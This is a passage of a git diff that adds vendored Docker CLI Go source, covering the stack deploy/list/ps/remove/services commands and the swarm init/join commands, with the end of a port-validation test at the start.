portConfigs[0].TargetPort, uint32(81)) + assert.Equal(t, portConfigs[1].TargetPort, uint32(82)) +} + +// FIXME(vdemeester) port to opts.PortOpt +func TestValidatePort(t *testing.T) { + validPorts := []string{"80/tcp", "80", "80/udp"} + invalidPorts := map[string]string{ + "9999999": "out of range", + "80:80/tcp": "invalid port format", + "53:53/udp": "invalid port format", + "80:80": "invalid port format", + "80/xyz": "invalid protocol", + "tcp": "invalid syntax", + "udp": "invalid syntax", + "": "invalid protocol", + } + for _, port := range validPorts { + _, err := validatePublishRemove(port) + assert.Equal(t, err, nil) + } + for port, e := range invalidPorts { + _, err := validatePublishRemove(port) + assert.Error(t, err, e) + } +} diff --git a/vendor/github.com/docker/docker/cli/command/stack/cmd.go b/vendor/github.com/docker/docker/cli/command/stack/cmd.go new file mode 100644 index 0000000000..860bfedd1a --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/stack/cmd.go @@ -0,0 +1,35 @@ +package stack + +import ( + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/spf13/cobra" +) + +// NewStackCommand returns a cobra command for `stack` subcommands +func NewStackCommand(dockerCli *command.DockerCli) *cobra.Command { + cmd := &cobra.Command{ + Use: "stack", + Short: "Manage Docker stacks", + Args: cli.NoArgs, + RunE: dockerCli.ShowHelp, + Tags: map[string]string{"version": "1.25"}, + } + cmd.AddCommand( + newDeployCommand(dockerCli), + newListCommand(dockerCli), + newRemoveCommand(dockerCli), + newServicesCommand(dockerCli), + newPsCommand(dockerCli), + ) + return cmd +} + +// NewTopLevelDeployCommand returns a command for `docker deploy` +func NewTopLevelDeployCommand(dockerCli *command.DockerCli) *cobra.Command { + cmd := newDeployCommand(dockerCli) + // Remove the aliases at the top level + cmd.Aliases = []string{} + cmd.Tags = map[string]string{"experimental": "", "version": "1.25"} + return cmd +} diff --git a/vendor/github.com/docker/docker/cli/command/stack/common.go b/vendor/github.com/docker/docker/cli/command/stack/common.go new file mode 100644 index 0000000000..72719f94fc --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/stack/common.go @@ -0,0 +1,60 @@ +package stack + +import ( + "golang.org/x/net/context" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/cli/compose/convert" + "github.com/docker/docker/client" + "github.com/docker/docker/opts" +) + +func getStackFilter(namespace string) filters.Args { + filter := filters.NewArgs() + filter.Add("label", convert.LabelNamespace+"="+namespace) + return filter +} + +func getStackFilterFromOpt(namespace string, opt opts.FilterOpt) filters.Args { + filter := opt.Value() + filter.Add("label", convert.LabelNamespace+"="+namespace) + return filter +} + +func getAllStacksFilter() filters.Args { + filter := filters.NewArgs() + filter.Add("label", convert.LabelNamespace) + return filter +} + +func getServices( + ctx context.Context, + apiclient client.APIClient, + namespace string, +) ([]swarm.Service, error) { + return apiclient.ServiceList( + ctx, + types.ServiceListOptions{Filters: getStackFilter(namespace)}) +} + +func getStackNetworks( + ctx context.Context, + apiclient client.APIClient, + namespace string, +) ([]types.NetworkResource, error) { + return apiclient.NetworkList( + ctx, + types.NetworkListOptions{Filters: getStackFilter(namespace)}) +} + +func getStackSecrets( + ctx context.Context, + apiclient client.APIClient, + namespace string, +) ([]swarm.Secret, error) { + return apiclient.SecretList( + ctx, + types.SecretListOptions{Filters: getStackFilter(namespace)}) +} diff --git a/vendor/github.com/docker/docker/cli/command/stack/deploy.go b/vendor/github.com/docker/docker/cli/command/stack/deploy.go new file mode 100644 index 0000000000..980876a6a1 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/stack/deploy.go @@ -0,0 +1,357 @@ +package stack + +import ( + "fmt" + "io/ioutil" + "os" + "sort" + "strings" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + secretcli "github.com/docker/docker/cli/command/secret" + "github.com/docker/docker/cli/compose/convert" + "github.com/docker/docker/cli/compose/loader" + composetypes "github.com/docker/docker/cli/compose/types" + dockerclient "github.com/docker/docker/client" + "github.com/pkg/errors" + "github.com/spf13/cobra" + "golang.org/x/net/context" +) + +const ( + defaultNetworkDriver = "overlay" +) + +type deployOptions struct { + bundlefile string + composefile string + namespace string + sendRegistryAuth bool +} + +func newDeployCommand(dockerCli *command.DockerCli) *cobra.Command { + var opts deployOptions + + cmd := &cobra.Command{ + Use: "deploy [OPTIONS] STACK", + Aliases: []string{"up"}, + Short: "Deploy a new stack or update an existing stack", + Args: cli.ExactArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + opts.namespace = args[0] + return runDeploy(dockerCli, opts) + }, + } + + flags := cmd.Flags() + addBundlefileFlag(&opts.bundlefile, flags) + addComposefileFlag(&opts.composefile, flags) + addRegistryAuthFlag(&opts.sendRegistryAuth, flags) + return cmd +} + +func runDeploy(dockerCli *command.DockerCli, opts deployOptions) error { + ctx := context.Background() + + switch { + case opts.bundlefile == "" && opts.composefile == "": + return fmt.Errorf("Please specify either a bundle file (with --bundle-file) or a Compose file (with --compose-file).") + case opts.bundlefile != "" && opts.composefile != "": + return fmt.Errorf("You cannot specify both a bundle file and a Compose file.") + case opts.bundlefile != "": + return deployBundle(ctx, dockerCli, opts) + default: + return deployCompose(ctx, dockerCli, opts) + } +} + +// checkDaemonIsSwarmManager does an Info API call to verify that the daemon is +// a swarm manager. This is necessary because we must create networks before we +// create services, but the API call for creating a network does not return a +// proper status code when it can't create a network in the "global" scope. +func checkDaemonIsSwarmManager(ctx context.Context, dockerCli *command.DockerCli) error { + info, err := dockerCli.Client().Info(ctx) + if err != nil { + return err + } + if !info.Swarm.ControlAvailable { + return errors.New("This node is not a swarm manager. Use \"docker swarm init\" or \"docker swarm join\" to connect this node to swarm and try again.") + } + return nil +} + +func deployCompose(ctx context.Context, dockerCli *command.DockerCli, opts deployOptions) error { + configDetails, err := getConfigDetails(opts) + if err != nil { + return err + } + + config, err := loader.Load(configDetails) + if err != nil { + if fpe, ok := err.(*loader.ForbiddenPropertiesError); ok { + return fmt.Errorf("Compose file contains unsupported options:\n\n%s\n", + propertyWarnings(fpe.Properties)) + } + + return err + } + + unsupportedProperties := loader.GetUnsupportedProperties(configDetails) + if len(unsupportedProperties) > 0 { + fmt.Fprintf(dockerCli.Err(), "Ignoring unsupported options: %s\n\n", + strings.Join(unsupportedProperties, ", ")) + } + + deprecatedProperties := loader.GetDeprecatedProperties(configDetails) + if len(deprecatedProperties) > 0 { + fmt.Fprintf(dockerCli.Err(), "Ignoring deprecated options:\n\n%s\n\n", + propertyWarnings(deprecatedProperties)) + } + + if err := checkDaemonIsSwarmManager(ctx, dockerCli); err != nil { + return err + } + + namespace := convert.NewNamespace(opts.namespace) + + serviceNetworks := getServicesDeclaredNetworks(config.Services) + networks, externalNetworks := convert.Networks(namespace, config.Networks, serviceNetworks) + if err := validateExternalNetworks(ctx, dockerCli, externalNetworks); err != nil { + return err + } + if err := createNetworks(ctx, dockerCli, namespace, networks); err != nil { + return err + } + + secrets, err := convert.Secrets(namespace, config.Secrets) + if err != nil { + return err + } + if err := createSecrets(ctx, dockerCli, namespace, secrets); err != nil { + return err + } + + services, err := convert.Services(namespace, config, dockerCli.Client()) + if err != nil { + return err + } + return deployServices(ctx, dockerCli, services, namespace, opts.sendRegistryAuth) +} +func getServicesDeclaredNetworks(serviceConfigs []composetypes.ServiceConfig) map[string]struct{} { + serviceNetworks := map[string]struct{}{} + for _, serviceConfig := range serviceConfigs { + if len(serviceConfig.Networks) == 0 { + serviceNetworks["default"] = struct{}{} + continue + } + for network := range serviceConfig.Networks { + serviceNetworks[network] = struct{}{} + } + } + return serviceNetworks +} + +func propertyWarnings(properties map[string]string) string { + var msgs []string + for name, description := range properties { + msgs = append(msgs, fmt.Sprintf("%s: %s", name, description)) + } + sort.Strings(msgs) + return strings.Join(msgs, "\n\n") +} + +func getConfigDetails(opts deployOptions) (composetypes.ConfigDetails, error) { + var details composetypes.ConfigDetails + var err error + + details.WorkingDir, err = os.Getwd() + if err != nil { + return details, err + } + + configFile, err := getConfigFile(opts.composefile) + if err != nil { + return details, err + } + // TODO: support multiple files + details.ConfigFiles = []composetypes.ConfigFile{*configFile} + return details, nil +} + +func getConfigFile(filename string) (*composetypes.ConfigFile, error) { + bytes, err := ioutil.ReadFile(filename) + if err != nil { + return nil, err + } + config, err := loader.ParseYAML(bytes) + if err != nil { + return nil, err + } + return &composetypes.ConfigFile{ + Filename: filename, + Config: config, + }, nil +} + +func validateExternalNetworks( + ctx context.Context, + dockerCli *command.DockerCli, + externalNetworks []string) error { + client := dockerCli.Client() + + for _, networkName := range externalNetworks { + network, err := client.NetworkInspect(ctx, networkName) + if err != nil { + if dockerclient.IsErrNetworkNotFound(err) { + return fmt.Errorf("network %q is declared as external, but could not be found. You need to create the network before the stack is deployed (with overlay driver)", networkName) + } + return err + } + if network.Scope != "swarm" { + return fmt.Errorf("network %q is declared as external, but it is not in the right scope: %q instead of %q", networkName, network.Scope, "swarm") + } + } + + return nil +} + +func createSecrets( + ctx context.Context, + dockerCli *command.DockerCli, + namespace convert.Namespace, + secrets []swarm.SecretSpec, +) error { + client := dockerCli.Client() + + for _, secretSpec := range secrets { + // TODO: fix this after https://github.com/docker/docker/pull/29218 + secrets, err := secretcli.GetSecretsByNameOrIDPrefixes(ctx, client, []string{secretSpec.Name}) + switch { + case err != nil: + return err + case len(secrets) > 1: + return errors.Errorf("ambiguous secret name: %s", secretSpec.Name) + case len(secrets) == 0: + fmt.Fprintf(dockerCli.Out(), "Creating secret %s\n", secretSpec.Name) + _, err = client.SecretCreate(ctx, secretSpec) + default: + secret := secrets[0] + // Update secret to ensure that the local data hasn't changed + err = client.SecretUpdate(ctx, secret.ID, secret.Meta.Version, secretSpec) + } + if err != nil { + return err + } + } + return nil +} + +func createNetworks( + ctx context.Context, + dockerCli *command.DockerCli, + namespace convert.Namespace, + networks map[string]types.NetworkCreate, +) error { + client := dockerCli.Client() + + existingNetworks, err := getStackNetworks(ctx, client, namespace.Name()) + if err != nil { + return err + } + + existingNetworkMap := make(map[string]types.NetworkResource) + for _, network := range existingNetworks { + existingNetworkMap[network.Name] = network + } + + for internalName, createOpts := range networks { + name := namespace.Scope(internalName) + if _, exists := existingNetworkMap[name]; exists { + continue + } + + if createOpts.Driver == "" { + createOpts.Driver = defaultNetworkDriver + } + + fmt.Fprintf(dockerCli.Out(), "Creating network %s\n", name) + if _, err := client.NetworkCreate(ctx, name, createOpts); err != nil { + return err + } + } + + return nil +} + +func deployServices( + ctx context.Context, + dockerCli *command.DockerCli, + services map[string]swarm.ServiceSpec, + namespace convert.Namespace, + sendAuth bool, +) error { + apiClient := dockerCli.Client() + out := dockerCli.Out() + + existingServices, err := getServices(ctx, apiClient, namespace.Name()) + if err != nil { + return err + } + + existingServiceMap := make(map[string]swarm.Service) + for _, service := range existingServices { + existingServiceMap[service.Spec.Name] = service + } + + for internalName, serviceSpec := range services { + name := namespace.Scope(internalName) + + encodedAuth := "" + if sendAuth { + // Retrieve encoded auth token from the image reference + image := serviceSpec.TaskTemplate.ContainerSpec.Image + encodedAuth, err = command.RetrieveAuthTokenFromImage(ctx, dockerCli, image) + if err != nil { + return err + } + } + + if service, exists := existingServiceMap[name]; exists { + fmt.Fprintf(out, "Updating service %s (id: %s)\n", name, service.ID) + + updateOpts := types.ServiceUpdateOptions{} + if sendAuth { + updateOpts.EncodedRegistryAuth = encodedAuth + } + response, err := apiClient.ServiceUpdate( + ctx, + service.ID, + service.Version, + serviceSpec, + updateOpts, + ) + if err != nil { + return err + } + + for _, warning := range response.Warnings { + fmt.Fprintln(dockerCli.Err(), warning) + } + } else { + fmt.Fprintf(out, "Creating service %s\n", name) + + createOpts := types.ServiceCreateOptions{} + if sendAuth { + createOpts.EncodedRegistryAuth = encodedAuth + } + if _, err := apiClient.ServiceCreate(ctx, serviceSpec, createOpts); err != nil { + return err + } + } + } + + return nil +} diff --git a/vendor/github.com/docker/docker/cli/command/stack/deploy_bundlefile.go b/vendor/github.com/docker/docker/cli/command/stack/deploy_bundlefile.go new file mode 100644 index 0000000000..5a178c4ab6 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/stack/deploy_bundlefile.go @@ -0,0 +1,83 @@ +package stack + +import ( + "golang.org/x/net/context" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/cli/command" + "github.com/docker/docker/cli/compose/convert" +) + +func deployBundle(ctx context.Context, dockerCli *command.DockerCli, opts deployOptions) error { + bundle, err := loadBundlefile(dockerCli.Err(), opts.namespace, opts.bundlefile) + if err != nil { + return err + } + + if err := checkDaemonIsSwarmManager(ctx, dockerCli); err != nil { + return err + } + + namespace := convert.NewNamespace(opts.namespace) + + networks := make(map[string]types.NetworkCreate) + for _, service := range bundle.Services { + for _, networkName := range service.Networks { + networks[networkName] = types.NetworkCreate{ + Labels: convert.AddStackLabel(namespace, nil), + } + } + } + + services := make(map[string]swarm.ServiceSpec) + for internalName, service := range bundle.Services { + name := namespace.Scope(internalName) + + var ports []swarm.PortConfig + for _, portSpec := range service.Ports { + ports = append(ports, swarm.PortConfig{ + Protocol: swarm.PortConfigProtocol(portSpec.Protocol), + TargetPort: portSpec.Port, + }) + } + + nets := []swarm.NetworkAttachmentConfig{} + for _, networkName := range service.Networks { + nets = append(nets, swarm.NetworkAttachmentConfig{ + Target: namespace.Scope(networkName), + Aliases: []string{networkName}, + }) + } + + serviceSpec := swarm.ServiceSpec{ + Annotations: swarm.Annotations{ + Name: name, + Labels: convert.AddStackLabel(namespace, service.Labels), + }, + TaskTemplate: swarm.TaskSpec{ + ContainerSpec: swarm.ContainerSpec{ + Image: service.Image, + Command: service.Command, + Args: service.Args, + Env: service.Env, + // Service Labels will not be copied to Containers + // automatically during the deployment so we apply + // it here. + Labels: convert.AddStackLabel(namespace, nil), + }, + }, + EndpointSpec: &swarm.EndpointSpec{ + Ports: ports, + }, + Networks: nets, + } + + services[internalName] = serviceSpec + } + + if err := createNetworks(ctx, dockerCli, namespace, networks); err != nil { + return err + } + return deployServices(ctx, dockerCli, services, namespace, opts.sendRegistryAuth) +} diff --git a/vendor/github.com/docker/docker/cli/command/stack/list.go b/vendor/github.com/docker/docker/cli/command/stack/list.go new file mode 100644 index 0000000000..9b6c645e29 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/stack/list.go @@ -0,0 +1,113 @@ +package stack + +import ( + "fmt" + "io" + "strconv" + "text/tabwriter" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/docker/docker/cli/compose/convert" + "github.com/docker/docker/client" + "github.com/spf13/cobra" +) + +const ( + listItemFmt = "%s\t%s\n" +) + +type listOptions struct { +} + +func newListCommand(dockerCli *command.DockerCli) *cobra.Command { + opts := listOptions{} + + cmd := &cobra.Command{ + Use: "ls", + Aliases: []string{"list"}, + Short: "List stacks", + Args: cli.NoArgs, + RunE: func(cmd *cobra.Command, args []string) error { + return runList(dockerCli, opts) + }, + } + + return cmd +} + +func runList(dockerCli *command.DockerCli, opts listOptions) error { + client := dockerCli.Client() + ctx := context.Background() + + stacks, err := getStacks(ctx, client) + if err != nil { + return err + } + + out := dockerCli.Out() + printTable(out, stacks) + return nil +} + +func printTable(out io.Writer, stacks []*stack) { + writer := tabwriter.NewWriter(out, 0, 4, 2, ' ', 0) + + // Ignore flushing errors + defer writer.Flush() + + fmt.Fprintf(writer, listItemFmt, "NAME", "SERVICES") + for _, stack := range stacks { + fmt.Fprintf( + writer, + listItemFmt, + stack.Name, + strconv.Itoa(stack.Services), + ) + } +} + +type stack struct { + // Name is the name of the stack + Name string + // Services is the number of the services + Services int +} + +func getStacks( + ctx context.Context, + apiclient client.APIClient, +) ([]*stack, error) { + services, err := apiclient.ServiceList( + ctx, + types.ServiceListOptions{Filters: getAllStacksFilter()}) + if err != nil { + return nil, err + } + m := make(map[string]*stack, 0) + for _, service := range services { + labels := service.Spec.Labels + name, ok := labels[convert.LabelNamespace] + if !ok { + return nil, fmt.Errorf("cannot get label %s for service %s", + convert.LabelNamespace, service.ID) + } + ztack, ok := m[name] + if !ok { + m[name] = &stack{ + Name: name, + Services: 1, + } + } else { + ztack.Services++ + } + } + var stacks []*stack + for _, stack := range m { + stacks = append(stacks, stack) + } + return stacks, nil +} diff --git a/vendor/github.com/docker/docker/cli/command/stack/opts.go b/vendor/github.com/docker/docker/cli/command/stack/opts.go new file mode 100644 index 0000000000..74fe4f5343 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/stack/opts.go @@ -0,0 +1,49 @@ +package stack + +import ( + "fmt" + "io" + "os" + + "github.com/docker/docker/cli/command/bundlefile" + "github.com/spf13/pflag" +) + +func addComposefileFlag(opt *string, flags *pflag.FlagSet) { + flags.StringVarP(opt, "compose-file", "c", "", "Path to a Compose file") +} + +func addBundlefileFlag(opt *string, flags *pflag.FlagSet) { + flags.StringVar(opt, "bundle-file", "", "Path to a Distributed Application Bundle file") + flags.SetAnnotation("bundle-file", "experimental", nil) +} + +func addRegistryAuthFlag(opt *bool, flags *pflag.FlagSet) { + flags.BoolVar(opt, "with-registry-auth", false, "Send registry authentication details to Swarm agents") +} + +func loadBundlefile(stderr io.Writer, namespace string, path string) (*bundlefile.Bundlefile, error) { + defaultPath := fmt.Sprintf("%s.dab", namespace) + + if path == "" { + path = defaultPath + } + if _, err := os.Stat(path); err != nil { + return nil, fmt.Errorf( + "Bundle %s not found. Specify the path with --file", + path) + } + + fmt.Fprintf(stderr, "Loading bundle from %s\n", path) + reader, err := os.Open(path) + if err != nil { + return nil, err + } + defer reader.Close() + + bundle, err := bundlefile.LoadFile(reader) + if err != nil { + return nil, fmt.Errorf("Error reading %s: %v\n", path, err) + } + return bundle, err +} diff --git a/vendor/github.com/docker/docker/cli/command/stack/ps.go b/vendor/github.com/docker/docker/cli/command/stack/ps.go new file mode 100644 index 0000000000..e4351bfc7c --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/stack/ps.go @@ -0,0 +1,61 @@ +package stack + +import ( + "fmt" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/docker/docker/cli/command/idresolver" + "github.com/docker/docker/cli/command/task" + "github.com/docker/docker/opts" + "github.com/spf13/cobra" +) + +type psOptions struct { + filter opts.FilterOpt + noTrunc bool + namespace string + noResolve bool +} + +func newPsCommand(dockerCli *command.DockerCli) *cobra.Command { + opts := psOptions{filter: opts.NewFilterOpt()} + + cmd := &cobra.Command{ + Use: "ps [OPTIONS] STACK", + Short: "List the tasks in the stack", + Args: cli.ExactArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + opts.namespace = args[0] + return runPS(dockerCli, opts) + }, + } + flags := cmd.Flags() + flags.BoolVar(&opts.noTrunc, "no-trunc", false, "Do not truncate output") + flags.BoolVar(&opts.noResolve, "no-resolve", false, "Do not map IDs to Names") + flags.VarP(&opts.filter, "filter", "f", "Filter output based on conditions provided") + + return cmd +} + +func runPS(dockerCli *command.DockerCli, opts psOptions) error { + namespace := opts.namespace + client := dockerCli.Client() + ctx := context.Background() + + filter := getStackFilterFromOpt(opts.namespace, opts.filter) + tasks, err := client.TaskList(ctx, types.TaskListOptions{Filters: filter}) + if err != nil { + return err + } + + if len(tasks) == 0 { + fmt.Fprintf(dockerCli.Out(), "Nothing found in stack: %s\n", namespace) + return nil + } + + return task.Print(dockerCli, ctx, tasks, idresolver.New(client, opts.noResolve), opts.noTrunc) +} diff --git a/vendor/github.com/docker/docker/cli/command/stack/remove.go b/vendor/github.com/docker/docker/cli/command/stack/remove.go new file mode 100644 index 0000000000..966c1aa6bf --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/stack/remove.go @@ -0,0 +1,112 @@ +package stack + +import ( + "fmt" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/spf13/cobra" + "golang.org/x/net/context" +) + +type removeOptions struct { + namespace string +} + +func newRemoveCommand(dockerCli *command.DockerCli) *cobra.Command { + var opts removeOptions + + cmd := &cobra.Command{ + Use: "rm STACK", + Aliases: []string{"remove", "down"}, + Short: "Remove the stack", + Args: cli.ExactArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + opts.namespace = args[0] + return runRemove(dockerCli, opts) + }, + } + return cmd +} + +func runRemove(dockerCli *command.DockerCli, opts removeOptions) error { + namespace := opts.namespace + client := dockerCli.Client() + ctx := context.Background() + + services, err := getServices(ctx, client, namespace) + if err != nil { + return err + } + + networks, err := getStackNetworks(ctx, client, namespace) + if err != nil { + return err + } + + secrets, err := getStackSecrets(ctx, client, namespace) + if err != nil { + return err + } + + if len(services)+len(networks)+len(secrets) == 0 { + fmt.Fprintf(dockerCli.Out(), "Nothing found in stack: %s\n", namespace) + return nil + } + + hasError := removeServices(ctx, dockerCli, services) + hasError = removeSecrets(ctx, dockerCli, secrets) || hasError + hasError = removeNetworks(ctx, dockerCli, networks) || hasError + + if hasError { + return fmt.Errorf("Failed to remove some resources") + } + return nil +} + +func removeServices( + ctx context.Context, + dockerCli *command.DockerCli, + services []swarm.Service, +) bool { + var err error + for _, service := range services { + fmt.Fprintf(dockerCli.Err(), "Removing service %s\n", service.Spec.Name) + if err = dockerCli.Client().ServiceRemove(ctx, service.ID); err != nil { + fmt.Fprintf(dockerCli.Err(), "Failed to remove service %s: %s", service.ID, err) + } + } + return err != nil +} + +func removeNetworks( + ctx context.Context, + dockerCli *command.DockerCli, + networks []types.NetworkResource, +) bool { + var err error + for _, network := range networks { + fmt.Fprintf(dockerCli.Err(), "Removing network %s\n", network.Name) + if err = dockerCli.Client().NetworkRemove(ctx, network.ID); err != nil { + fmt.Fprintf(dockerCli.Err(), "Failed to remove network %s: %s", network.ID, err) + } + } + return err != nil +} + +func removeSecrets( + ctx context.Context, + dockerCli *command.DockerCli, + secrets []swarm.Secret, +) bool { + var err error + for _, secret := range secrets { + fmt.Fprintf(dockerCli.Err(), "Removing secret %s\n", secret.Spec.Name) + if err = dockerCli.Client().SecretRemove(ctx, secret.ID); err != nil { + fmt.Fprintf(dockerCli.Err(), "Failed to remove secret %s: %s", secret.ID, err) + } + } + return err != nil +} diff --git a/vendor/github.com/docker/docker/cli/command/stack/services.go b/vendor/github.com/docker/docker/cli/command/stack/services.go new file mode 100644 index 0000000000..a46652df7c --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/stack/services.go @@ -0,0 +1,79 @@ +package stack + +import ( + "fmt" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/docker/docker/cli/command/service" + "github.com/docker/docker/opts" + "github.com/spf13/cobra" +) + +type servicesOptions struct { + quiet bool + filter opts.FilterOpt + namespace string +} + +func newServicesCommand(dockerCli *command.DockerCli) *cobra.Command { + opts := servicesOptions{filter: opts.NewFilterOpt()} + + cmd := &cobra.Command{ + Use: "services [OPTIONS] STACK", + Short: "List the services in the stack", + Args: cli.ExactArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + opts.namespace = args[0] + return runServices(dockerCli, opts) + }, + } + flags := cmd.Flags() + flags.BoolVarP(&opts.quiet, "quiet", "q", false, "Only display IDs") + flags.VarP(&opts.filter, "filter", "f", "Filter output based on conditions provided") + + return cmd +} + +func runServices(dockerCli *command.DockerCli, opts servicesOptions) error { + ctx := context.Background() + client := dockerCli.Client() + + filter := getStackFilterFromOpt(opts.namespace, opts.filter) + services, err := client.ServiceList(ctx, types.ServiceListOptions{Filters: filter}) + if err != nil { + return err + } + + out := dockerCli.Out() + + // if no services in this stack, print message and exit 0 + if len(services) == 0 { + fmt.Fprintf(out, "Nothing found in stack: %s\n", opts.namespace) + return nil + } + + if opts.quiet { + service.PrintQuiet(out, services) + } else { + taskFilter := filters.NewArgs() + for _, service := range services { + taskFilter.Add("service", service.ID) + } + + tasks, err := client.TaskList(ctx, types.TaskListOptions{Filters: taskFilter}) + if err != nil { + return err + } + nodes, err := client.NodeList(ctx, types.NodeListOptions{}) + if err != nil { + return err + } + service.PrintNotQuiet(out, services, nodes, tasks) + } + return nil +} diff --git a/vendor/github.com/docker/docker/cli/command/swarm/cmd.go b/vendor/github.com/docker/docker/cli/command/swarm/cmd.go new file mode 100644 index 0000000000..632679c4b6 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/swarm/cmd.go @@ -0,0 +1,28 @@ +package swarm + +import ( + "github.com/spf13/cobra" + + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" +) + +// NewSwarmCommand returns a cobra command for `swarm` subcommands +func NewSwarmCommand(dockerCli *command.DockerCli) *cobra.Command { + cmd := &cobra.Command{ + Use: "swarm", + Short: "Manage Swarm", + Args: cli.NoArgs, + RunE: dockerCli.ShowHelp, + } + cmd.AddCommand( + newInitCommand(dockerCli), + newJoinCommand(dockerCli), + newJoinTokenCommand(dockerCli), + newUnlockKeyCommand(dockerCli), + newUpdateCommand(dockerCli), + newLeaveCommand(dockerCli), + newUnlockCommand(dockerCli), + ) + return cmd +} diff --git a/vendor/github.com/docker/docker/cli/command/swarm/init.go b/vendor/github.com/docker/docker/cli/command/swarm/init.go new file mode 100644 index 0000000000..2550feeb47 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/swarm/init.go @@ -0,0 +1,85 @@ +package swarm + +import ( + "fmt" + "strings" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/pkg/errors" + "github.com/spf13/cobra" + "github.com/spf13/pflag" +) + +type initOptions struct { + swarmOptions + listenAddr NodeAddrOption + // Not a NodeAddrOption because it has no default port. + advertiseAddr string + forceNewCluster bool +} + +func newInitCommand(dockerCli *command.DockerCli) *cobra.Command { + opts := initOptions{ + listenAddr: NewListenAddrOption(), + } + + cmd := &cobra.Command{ + Use: "init [OPTIONS]", + Short: "Initialize a swarm", + Args: cli.NoArgs, + RunE: func(cmd *cobra.Command, args []string) error { + return runInit(dockerCli, cmd.Flags(), opts) + }, + } + + flags := cmd.Flags() + flags.Var(&opts.listenAddr, flagListenAddr, "Listen address (format: [:port])") + flags.StringVar(&opts.advertiseAddr, flagAdvertiseAddr, "", "Advertised address (format: [:port])") + flags.BoolVar(&opts.forceNewCluster, "force-new-cluster", false, "Force create a new cluster from current state") + flags.BoolVar(&opts.autolock, flagAutolock, false, "Enable manager autolocking (requiring an unlock key to start a stopped manager)") + addSwarmFlags(flags, &opts.swarmOptions) + return cmd +} + +func runInit(dockerCli *command.DockerCli, flags *pflag.FlagSet, opts initOptions) error { + client := dockerCli.Client() + ctx := context.Background() + + req := swarm.InitRequest{ + ListenAddr: opts.listenAddr.String(), + AdvertiseAddr: opts.advertiseAddr, + ForceNewCluster: opts.forceNewCluster, + Spec: opts.swarmOptions.ToSpec(flags), + AutoLockManagers: opts.swarmOptions.autolock, + } + + nodeID, err := client.SwarmInit(ctx, req) + if err != nil { + if strings.Contains(err.Error(), "could not choose an IP address to advertise") || strings.Contains(err.Error(), "could not find the system's IP address") { + return errors.New(err.Error() + " - specify one with --advertise-addr") + } + return err + } + + fmt.Fprintf(dockerCli.Out(), "Swarm initialized: current node (%s) is now a manager.\n\n", nodeID) + + if err := printJoinCommand(ctx, dockerCli, nodeID, true, false); err != nil { + return err + } + + fmt.Fprint(dockerCli.Out(), "To add a manager to this swarm, run 'docker swarm join-token manager' and follow the instructions.\n\n") + + if req.AutoLockManagers { + unlockKeyResp, err := client.SwarmGetUnlockKey(ctx) + if err != nil { + return errors.Wrap(err, "could not fetch unlock key") + } + printUnlockCommand(ctx, dockerCli, unlockKeyResp.UnlockKey) + } + + return nil +} diff --git a/vendor/github.com/docker/docker/cli/command/swarm/join.go b/vendor/github.com/docker/docker/cli/command/swarm/join.go new file mode 100644 index 0000000000..004313b4c6 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/swarm/join.go @@ -0,0 +1,69 @@ +package swarm + +import ( + "fmt" + + "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/spf13/cobra" + "golang.org/x/net/context" +) + +type joinOptions struct { + remote string + listenAddr NodeAddrOption + // Not a NodeAddrOption because it has no default port. + advertiseAddr string + token string +} + +func newJoinCommand(dockerCli *command.DockerCli) *cobra.Command { + opts := joinOptions{ + listenAddr: NewListenAddrOption(), + } + + cmd := &cobra.Command{ + Use: "join [OPTIONS] HOST:PORT", + Short: "Join a swarm as a node and/or manager", + Args: cli.ExactArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + opts.remote = args[0] + return runJoin(dockerCli, opts) + }, + } + + flags := cmd.Flags() + flags.Var(&opts.listenAddr, flagListenAddr, "Listen address (format: [:port])") + flags.StringVar(&opts.advertiseAddr, flagAdvertiseAddr, "", "Advertised address (format: [:port])") + flags.StringVar(&opts.token, flagToken, "", "Token for entry into the swarm") + return cmd +} + +func runJoin(dockerCli *command.DockerCli, opts joinOptions) error { + client := dockerCli.Client() + ctx := context.Background() + + req := swarm.JoinRequest{ + JoinToken: opts.token, + ListenAddr: opts.listenAddr.String(), + AdvertiseAddr: opts.advertiseAddr, + RemoteAddrs: []string{opts.remote}, + } + err := client.SwarmJoin(ctx, req) + if err != nil { + return err + } + + info, err := client.Info(ctx) + if err != nil { + return err + } + + if info.Swarm.ControlAvailable { + fmt.Fprintln(dockerCli.Out(), "This node joined a swarm as a manager.") + } else { + 